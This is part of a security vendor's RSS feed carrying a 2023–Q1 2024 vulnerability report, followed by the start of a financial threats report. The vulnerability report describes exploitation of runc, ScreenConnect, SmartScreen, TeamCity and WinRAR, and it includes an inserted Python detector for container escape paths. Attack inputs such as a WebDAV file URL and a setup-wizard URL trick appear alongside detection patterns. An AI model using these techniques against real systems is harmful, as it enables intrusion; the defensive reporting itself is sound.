https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-740x412.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-503x280.png 503w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-800x445.png 800w" sizes="(max-width: 962px) 100vw, 962px" /></a><p id="caption-attachment-112557" class="wp-caption-text">A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR</p></div>
  323. <div id="attachment_112558" style="width: 963px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112558" class="size-full wp-image-112558" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" alt="A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions" width="953" height="608" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-300x191.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-768x490.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-549x350.png 549w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-740x472.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-439x280.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-800x510.png 800w" sizes="(max-width: 953px) 100vw, 953px" /></a><p id="caption-attachment-112558" class="wp-caption-text">A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions</p></div>
  324. <h3 id="most-prevalent-exploits">Most prevalent exploits</h3>
  325. <p>We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:</p>
  326. <ul>
  327. <li>Browsers;</li>
  328. <li>Operating systems (Windows, Linux, macOS);</li>
  329. <li>Microsoft Exchange servers and server components;</li>
  330. <li>Microsoft SharePoint servers and server components;</li>
  331. <li>The Microsoft Office suite;</li>
  332. <li>All other applications that fall outside the five categories above.</li>
  333. </ul>
  334. <p>Let&#8217;s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.</p>
  335. <div class="js-infogram-embed" data-id="_/3GTp2brFdNLmDsvrvg0O" data-type="interactive" data-title="07 EN Vulnerability report graphs" style="min-height:;"></div>
  336. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091149/07-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  337. <div class="js-infogram-embed" data-id="_/W4TJxSPFu2utI4NI3xWc" data-type="interactive" data-title="08 EN Vulnerability report graphs" style="min-height:;"></div>
  338. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091036/08-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  339. <p>The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:</p>
  340. <ul>
  341. <li>Operating systems;</li>
  342. <li>Browsers.</li>
  343. </ul>
  344. <p>However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the &#8220;other software&#8221; category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.</p>
  345. <h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2>
  346. <p>Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.</p>
  347. <div id="attachment_112567" style="width: 1610px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112567" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" alt="" width="1600" height="1086" class="size-full wp-image-112567" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-1536x1043.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs-800x543.png 800w" sizes="(max-width: 1600px) 100vw, 1600px" /></a><p id="caption-attachment-112567" class="wp-caption-text">The top 10 vulnerabilities exploited in APT attacks, 2023</p></div>
  348. <div id="attachment_112568" style="width: 1610px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112568" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" alt="" width="1600" height="1086" class="size-full wp-image-112568" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-300x204.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-1024x695.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-768x521.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-1536x1043.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-516x350.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-740x502.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-413x280.png 413w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs-800x543.png 800w" sizes="(max-width: 1600px) 100vw, 1600px" /></a><p id="caption-attachment-112568" class="wp-caption-text">The top 10 vulnerabilities exploited in APT attacks, Q1 2024</p></div>
  349. <p>The statistics presented above indicate that popular entry points for malicious actors currently are:</p>
  350. <ul>
  351. <li>Vulnerable remote access services like Ivanti or ScreenConnect.</li>
  352. <li>Vulnerable access control features like Windows SmartScreen.</li>
  353. <li>Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.</li>
  354. </ul>
  355. <p>Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).</p>
  356. <h2 id="notable-q1-2024-vulnerabilities">Notable Q1 2024 vulnerabilities</h2>
  357. <p>This section deals with the most interesting vulnerabilities registered in Q1 2024.</p>
  358. <h3 id="cve-2024-3094-xz">CVE-2024-3094 (XZ)</h3>
  359. <p>A <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">backdoor</a> was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Upon loading such a library, the malicious code would begin modifying functions in memory that are exported by certain distributions for SSH server operation, enabling the attackers to send commands to the infected server.</p>
  360. <p>The backdoor&#8217;s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.</p>
  361. <h3 id="cve-2024-20656-visual-studio">CVE-2024-20656 (Visual Studio)</h3>
  362. <p>This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any user can do whatever they wish with them. The vulnerability is intriguing due to its exploitation algorithm.</p>
  363. <p>The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir =&gt; Global\\GLOBALROOT\\RPC Control =&gt; TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.</p>
  364. <p>This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.</p>
  365. <p>We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36874" target="_blank" rel="noopener">CVE-2023-36874</a>, which malicious actors began exploiting even before it was discovered.</p>
  366. <h3 id="cve-2024-21626-runc">CVE-2024-21626 (runc)</h3>
  367. <p>OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.</p>
  368. <p>The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call&#8217;s characteristic feature is the method by which it launches a child process, which is copied from the parent process.</p>
  369. <p>This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to account for such data, this can lead to a data disclosure vulnerability, <a href="https://cwe.mitre.org/data/definitions/403.html" target="_blank" rel="noopener">CWE-403</a> – Exposure of File Descriptor to Unintended Control Sphere, according to the <a href="https://cwe.mitre.org/" target="_blank" rel="noopener">CWE category system</a>.</p>
  370. <p>CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers; therefore, a running container acts as a child process relative to runc. If you try accessing the <em>/proc/self</em> directory from that container, you can obtain descriptors for all files opened by the runc process. Navigation of accessible resources and descriptors in Linux follows file system rules. Hence, attackers quickly started using the relative path to interpreters accessible to the parent process to escape the container.</p>
  371. <p>You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:</p>
  372. <p style="text-align: center;font-size: 80%">/proc/self/cwd/../</p>
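<p>To make the indicator above actionable, here is an added example (not code from the report or from the runc project) that scans constructed container activity records for paths that enter an inherited /proc handle and then climb out of it with "..". Matching a numeric PID instead of self, and fd/N in addition to cwd, is this example's own generalization of the report's /proc/self/cwd/../ pattern; the sample events are made up.</p>

```python
"""Flag container activity that reaches through runc's inherited /proc handles (CVE-2024-21626)."""
import re
import shlex

# Constructed sample events in the shape a container runtime or audit pipeline
# might emit (container id, process name, accessed path or full command line).
# Made-up records for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"container": "web-1", "comm": "sh", "path": "/proc/self/cwd/../../../bin/bash"},
    {"container": "web-1", "comm": "node", "path": "/app/server.js"},
    {"container": "db-2", "comm": "sh", "path": "/proc/1234/cwd/../etc/shadow"},
    {"container": "db-2", "comm": "cat", "path": "/proc/self/cwd/config.yaml"},
    {"container": "ci-3", "comm": "ls", "cmdline": "ls -la /proc/self/fd/7/../../etc"},
    {"container": "ci-3", "comm": "ls", "cmdline": "ls -la /proc/self/cwd"},
]

# The indicator named in the report is "/proc/self/cwd/../": a path that enters a
# procfs handle inherited from runc and then climbs out of it with "..".
# Also matching a numeric PID and fd/N is this example's own generalization
# (assumption): /proc/self is an alias for /proc/PID, and the leaked
# descriptors themselves are exposed under fd/.
ESCAPE_RE = re.compile(r"^/proc/(?:self|\d+)/(?:cwd|fd/\d+)/\.\.(?:/|$)")


def is_escape_path(path: str) -> bool:
    """True when a path climbs out of an inherited /proc handle with '..'.
    Plain use of /proc/self/cwd without traversal is not flagged."""
    return ESCAPE_RE.match(path) is not None


def paths_in_event(event: dict) -> list:
    """Collect candidate paths from an event: the 'path' field plus, for exec
    events, every command-line token that is an absolute path."""
    found = []
    if "path" in event:
        found.append(event["path"])
    if "cmdline" in event:
        try:
            tokens = shlex.split(event["cmdline"])
        except ValueError:  # unbalanced quotes: fall back to a plain split
            tokens = event["cmdline"].split()
        found.extend(t for t in tokens if t.startswith("/"))
    return found


def scan_events(events: list) -> list:
    """Return one alert per event that touches an escape path."""
    alerts = []
    for ev in events:
        hits = [p for p in paths_in_event(ev) if is_escape_path(p)]
        if hits:
            alerts.append({
                "container": ev["container"],
                "comm": ev["comm"],
                "paths": hits,
                "reason": "traversal out of an inherited /proc handle (CVE-2024-21626 pattern)",
            })
    return alerts


def alerts_by_container(events: list) -> dict:
    """Count alerts per container; a handy aggregation key for triage."""
    counts = {}
    for alert in scan_events(events):
        counts[alert["container"]] = counts.get(alert["container"], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Feed it the path or command-line fields of your runtime's exec/open events; the last sample shows that ordinary access to /proc/self/cwd without ".." is left alone.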
  373. <h3 id="cve-2024-1708-screenconnect">CVE-2024-1708 (ScreenConnect)</h3>
  374. <p>ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.</p>
  375. <p>Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application&#8217;s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a &#8220;/&#8221; character to the original request URL like this: <span style="font-size: 80%">http://vuln.server/SetupWizard.aspx</span>. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.</p>
  376. <p>The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server&#8217;s web interface.</p>
  377. <h3 id="cve-2024-21412-windows-defender">CVE-2024-21412 (Windows Defender)</h3>
  378. <p>The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/" target="_blank" rel="noopener">SmartScreen Filter</a>. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.</p>
  379. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112559" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" alt="" width="666" height="248" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png 666w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04-300x112.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></a></p>
  380. <p>Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.</p>
  381. <p>Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.</p>
  382. <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112560" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" alt="" width="395" height="234" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png 395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05-300x178.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></a></p>
  383. <p>This can be achieved by interacting with a file stored in a network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:</p><pre class="crayon-plain-tag">URL=file://ip_address@port/webdav/TEST.URL</pre>
  384. <h3 id="cve-2024-27198-teamcity">CVE-2024-27198 (TeamCity)</h3>
  385. <p>This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:</p>
  386. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112561" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" alt="" width="398" height="40" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06-300x30.png 300w" sizes="(max-width: 398px) 100vw, 398px" /></a></p>
  387. <p>The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.</p>
  388. <p>Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.</p>
  389. <h3 id="cve-2023-38831-winrar">CVE-2023-38831 (WinRAR)</h3>
  390. <p>Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.</p>
  391. <p>This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.</p>
  392. <p>Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:</p>
  393. <ul>
  394. <li>ZIP archives;</li>
  395. <li>RAR archives.</li>
  396. </ul>
  397. <p>The variety of malware and of legitimate archives makes it impossible to determine definitively whether an archive is an exploit. However, we can identify the key characteristics of an exploit:</p>
  398. <ul>
  399. <li>The archive contains files whose names match those of subdirectories.</li>
  400. <li>At least one file name contains a space before the extension.</li>
  401. <li>The archive must contain an executable located inside the subdirectory.</li>
  402. </ul>
  403. <p>Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:</p>
  404. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112562" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" alt="" width="872" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-768x144.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-740x139.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-800x150.png 800w" sizes="(max-width: 872px) 100vw, 872px" /></a></p>
  405. <p>For RAR files, like this:</p>
  406. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112563" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" alt="" width="861" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png 861w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-300x200.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-768x513.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-524x350.png 524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-740x494.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-419x280.png 419w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-800x534.png 800w" sizes="(max-width: 861px) 100vw, 861px" /></a></p>
  407. <p>Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.</p>
  408. <h2 id="conclusions-and-advice">Conclusions and advice</h2>
  409. <p>In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:</p>
  410. <ul>
  411. <li>Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.</li>
  412. <li>Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions can assist you in this endeavor.</li>
  413. <li>Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your employees. We recommend our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a> suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.</li>
  414. </ul>
  415. ]]></content:encoded>
  416. <wfw:commentRss>https://securelist.com/vulnerability-report-q1-2024/112554/feed/</wfw:commentRss>
  417. <slash:comments>0</slash:comments>
  418. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  419. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  420. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  421. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  422. </item>
  423. <item>
  424. <title>Financial cyberthreats in 2023</title>
  425. <link>https://securelist.com/financial-threat-report-2023/112526/</link>
  426. <comments>https://securelist.com/financial-threat-report-2023/112526/#respond</comments>
  427. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  428. <pubDate>Mon, 06 May 2024 10:00:31 +0000</pubDate>
  429. <category><![CDATA[Publications]]></category>
  430. <category><![CDATA[Emotet]]></category>
  431. <category><![CDATA[Financial malware]]></category>
  432. <category><![CDATA[Fraud]]></category>
  433. <category><![CDATA[Google Android]]></category>
  434. <category><![CDATA[Microsoft Windows]]></category>
  435. <category><![CDATA[Mobile Malware]]></category>
  436. <category><![CDATA[Phishing]]></category>
  437. <category><![CDATA[QakBot]]></category>
  438. <category><![CDATA[Trojan Banker]]></category>
  439. <category><![CDATA[ZeuS]]></category>
  440. <category><![CDATA[Financial threats]]></category>
  441. <category><![CDATA[Mobile threats]]></category>
  442. <category><![CDATA[Spam and Phishing]]></category>
  443. <category><![CDATA[Windows malware]]></category>
  444. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112526</guid>
  445.  
  446. <description><![CDATA[In this report, we share our insights into the 2023 trends and statistics on financial threats, such as phishing, PC and mobile banking malware.]]></description>
  447. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With <a href="https://www.statista.com/outlook/fmo/digital-payments/worldwide#transaction-value" target="_blank" rel="noopener">trillions of dollars</a> of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.</p>
  448. <h2 id="methodology">Methodology</h2>
  449. <p>In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).</p>
  450. <h2 id="key-findings">Key findings</h2>
  451. <h3 id="phishing">Phishing</h3>
  452. <ul>
  453. <li>Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.</li>
  454. <li>Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.</li>
  455. <li>PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.</li>
  456. <li>Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.</li>
  457. </ul>
  458. <h3 id="pc-malware">PC malware</h3>
  459. <ul>
  460. <li>The number of users affected by financial malware for PCs dropped by 11% from 2022.</li>
  461. <li>Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.</li>
  462. <li>Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.</li>
  463. </ul>
  464. <h3 id="mobile-malware">Mobile malware</h3>
  465. <ul>
  466. <li>The number of Android users attacked by banking malware increased by 32% compared to the previous year.</li>
  467. <li>Agent was the most active mobile malware family, making up 38% of all Android attacks.</li>
  468. <li>Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.</li>
  469. </ul>
